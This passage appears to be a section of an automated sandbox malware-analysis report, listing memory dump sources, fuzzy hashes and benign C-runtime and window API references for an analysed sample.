                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: de77a9e2e23fdc2508b6277d0e0834adfdd63261bd26dfffe74de099960ef510
                                                                                                                    • Instruction ID: f512ea40ef2f0323cfb920a6d108c0941b50e4a2f3120330938f3df183633390
                                                                                                                    • Opcode Fuzzy Hash: de77a9e2e23fdc2508b6277d0e0834adfdd63261bd26dfffe74de099960ef510
                                                                                                                    • Instruction Fuzzy Hash: C6A01130202200AF8B008F32AE0820A3AAAAB022C0308002BA208E00A0EA2080A8AA00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: 34f631343a6075681da3014631d2fe6e12b38d497d5e1fb71676f1a96c1c26b5
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: AA62F9716047849FCB29CF28D4906B9BBE1FF96304F08996ED8DA9B342D734E945CB12
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: fc2c42ff375e1a5f03a88ed0459d0649306f3a03b7305da44779ce68d787f07d
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: C362E3716083858FCB19CF28D8809B9BBE1FF99304F08996DE8DA9B346D730E945CB55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 8dadf02e9425a433324dd61ea760fbc3d3bd1dd5357e33f908e0c6c86d7770d4
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: B0523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8073b1f4d4717f5268015c1c0cc392ee6c5132c6265ca16c57fda0e01a9f9195
                                                                                                                    • Instruction ID: 946297b2ae8f178447401e0d9cc4a0724871ba837ddc131ae2e400ba5a2f47b4
                                                                                                                    • Opcode Fuzzy Hash: 8073b1f4d4717f5268015c1c0cc392ee6c5132c6265ca16c57fda0e01a9f9195
                                                                                                                    • Instruction Fuzzy Hash: 5A12D2B16187068FC728CF28D494AB9B7E1FF94308F14992EE9D6D7780D334A994CB85
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71350d6e34447bef22ff7382f68c23d1952503ac5683cb4df51389adf0693ee6
                                                                                                                    • Instruction ID: e3428ce6a22243e2807b0b6aa226a476ea98358175a4c8d5ad09039bfd6951b9
                                                                                                                    • Opcode Fuzzy Hash: 71350d6e34447bef22ff7382f68c23d1952503ac5683cb4df51389adf0693ee6
                                                                                                                    • Instruction Fuzzy Hash: 7BF1AB71A083018FC718CF28C58866ABFE5EFCA718F256A2EF5C5B7251D631E945CB42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4a926af1be7af2c6d30b285b7186f90e17bbdf871c6a822640b31cc33ac1db12
                                                                                                                    • Instruction ID: 1f3f6d948594346012b0101557c5cf06c687ed8afe968a8be907b83964427a17
                                                                                                                    • Opcode Fuzzy Hash: 4a926af1be7af2c6d30b285b7186f90e17bbdf871c6a822640b31cc33ac1db12
                                                                                                                    • Instruction Fuzzy Hash: E3D1B6B1A083418FDB14DF28D84475BBBE1BF89308F04556DE8C9AB342D774EA09CB96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7c7d390785a611dbcd73124dd5acfb0f083dd190b94c3ed53bab2e71b3371a6c
                                                                                                                    • Instruction ID: 53a30440557a14c2aa8841af9eda268e9c7c5c12511db0e8fd08ee26741ba517
                                                                                                                    • Opcode Fuzzy Hash: 7c7d390785a611dbcd73124dd5acfb0f083dd190b94c3ed53bab2e71b3371a6c
                                                                                                                    • Instruction Fuzzy Hash: 54E16D755083948FC304CF6AD89046ABFF0AF9A304F45095EF9C8A7392C235EA59DF92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: dc4a5f478311b5be0d498af945f4c487615510c2d6e224237ff3a4c9269185a4
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 039157F03003458BDB28EF64F899BFA77D5EBA0304F14192DF596A72C2DA749585C352

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
• Instruction ID: 6758c05c035104a8090d4ed34f469f7b99b8ff21456e875526b6258564d40e49
• Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
• Instruction Fuzzy Hash: A5815AF13043464BDF28DE68E885BBD37D4EB90308F04193DE9D6AB2C2DA748985C752

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bff0987ef12eff1bc079a97437faaee4eac596345126e006c7c833117cce5410
• Instruction ID: 17def758b74add340b86f68acaab65d19ce5c1494b3c50e201279aeeeb9fbc40
• Opcode Fuzzy Hash: bff0987ef12eff1bc079a97437faaee4eac596345126e006c7c833117cce5410
• Instruction Fuzzy Hash: 5861593B600F0496DA345A68A8B57FE23A4EB0174BF143D1AEC47FF2A1D2919D4E8711

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
• Instruction ID: 48a928fd8662e41f83331b73e63cc21ed4a8291da0c38e07d0dcf1c9d1d19bec
• Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
• Instruction Fuzzy Hash: 9E5113A3200F4467DB3456688576BBF67D59B0230FF183C19ED82FB2C2D605AD8D83A1

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64ac1936fa1795837d5d5cf2114cb11b3bb3fe2c735a0a549e2146cbfcd38978
• Instruction ID: 264806be2baa27ac23bd2e380c799c668c7c88f6c9667631291bfd1e43044270
• Opcode Fuzzy Hash: 64ac1936fa1795837d5d5cf2114cb11b3bb3fe2c735a0a549e2146cbfcd38978
• Instruction Fuzzy Hash: 8D51F8359093D58FC711CF38D14446EBFE0AE9A318F4919AEE4D96B243C231DB4ACB62

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c43dc15d01839d002e3a3c53856eb317291ffd0cad67265b16c9d64aa1edd794
• Instruction ID: 594c6360eb75056a4ebec888ed5b0901f0837332486f7ae0d9a4f7f174efc808
• Opcode Fuzzy Hash: c43dc15d01839d002e3a3c53856eb317291ffd0cad67265b16c9d64aa1edd794
• Instruction Fuzzy Hash: 0D51EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA59CB9A

Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
• Instruction ID: f7110195306e5c0ef2c159395bfa81bf9bcea8474557efcbc3f49a5ccc743c08
• Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
• Instruction Fuzzy Hash: DA3102B1B047068FCB18DF28C8552AABBE0FB95304F14592DE4C9E7342C734EA4ACB91

APIs
• _swprintf.LIBCMT ref: 00E3E30E
  • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
  • Part of subcall function 00E41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E71030,00000200,00E3D928,00000000,?,00000050,00E71030), ref: 00E41DC4
• _strlen.LIBCMT ref: 00E3E32F
• SetDlgItemTextW.USER32(?,00E6E274,?), ref: 00E3E38F
• GetWindowRect.USER32(?,?), ref: 00E3E3C9
• GetClientRect.USER32(?,?), ref: 00E3E3D5
• GetWindowLongW.USER32(?,000000F0), ref: 00E3E475
• GetWindowRect.USER32(?,?), ref: 00E3E4A2
• SetWindowTextW.USER32(?,?), ref: 00E3E4DB
• GetSystemMetrics.USER32(00000008), ref: 00E3E4E3
• GetWindow.USER32(?,00000005), ref: 00E3E4EE
• GetWindowRect.USER32(00000000,?), ref: 00E3E51B
• GetWindow.USER32(00000000,00000002), ref: 00E3E58D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d$t
• API String ID: 2407758923-369353836
• Opcode ID: 0424f4680fbeb75fd9e731aa49c5b86c4746b2e82ce8f1aac4c8fab5cf898100
• Instruction ID: e5aab3104fdeb1278f860e03ba6ac3514ae1916cc5b3e4e84b2f63e2a3630fe2
• Opcode Fuzzy Hash: 0424f4680fbeb75fd9e731aa49c5b86c4746b2e82ce8f1aac4c8fab5cf898100
• Instruction Fuzzy Hash: 62819171208301AFD710DF69CD89A6FBBE9EBC8704F04191EF984B7290D671E909CB52

APIs
• ___free_lconv_mon.LIBCMT ref: 00E5CB66
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C71E
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C730
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C742
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C754
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C766
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C778
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C78A
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C79C
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7AE
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7C0
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7D2
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7E4
  • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7F6
• _free.LIBCMT ref: 00E5CB5B
  • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
  • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
• _free.LIBCMT ref: 00E5CB7D
• _free.LIBCMT ref: 00E5CB92
• _free.LIBCMT ref: 00E5CB9D
• _free.LIBCMT ref: 00E5CBBF
• _free.LIBCMT ref: 00E5CBD2
• _free.LIBCMT ref: 00E5CBE0
• _free.LIBCMT ref: 00E5CBEB
• _free.LIBCMT ref: 00E5CC23
• _free.LIBCMT ref: 00E5CC2A
• _free.LIBCMT ref: 00E5CC47
• _free.LIBCMT ref: 00E5CC5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID: h
• API String ID: 161543041-3415971826
• Opcode ID: d54240f4791727d7e8a1f6d1aa3cdd86b4dc8213b9e0d3274e1bbca7b8e1ba23
• Instruction ID: 43e63a2ff1ec70d7e47a6619e9b26fcb49a378e9c964cd5575b8e73679e2e20c
• Opcode Fuzzy Hash: d54240f4791727d7e8a1f6d1aa3cdd86b4dc8213b9e0d3274e1bbca7b8e1ba23
                                                                                                                    • Instruction Fuzzy Hash: 5C314D316003099FEB20AA38D956B5AB7F9EF50316F207C19E958F7192DF35AC88CB10
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E59705
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E59711
                                                                                                                    • _free.LIBCMT ref: 00E5971C
                                                                                                                    • _free.LIBCMT ref: 00E59727
                                                                                                                    • _free.LIBCMT ref: 00E59732
                                                                                                                    • _free.LIBCMT ref: 00E5973D
                                                                                                                    • _free.LIBCMT ref: 00E59748
                                                                                                                    • _free.LIBCMT ref: 00E59753
                                                                                                                    • _free.LIBCMT ref: 00E5975E
                                                                                                                    • _free.LIBCMT ref: 00E5976C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
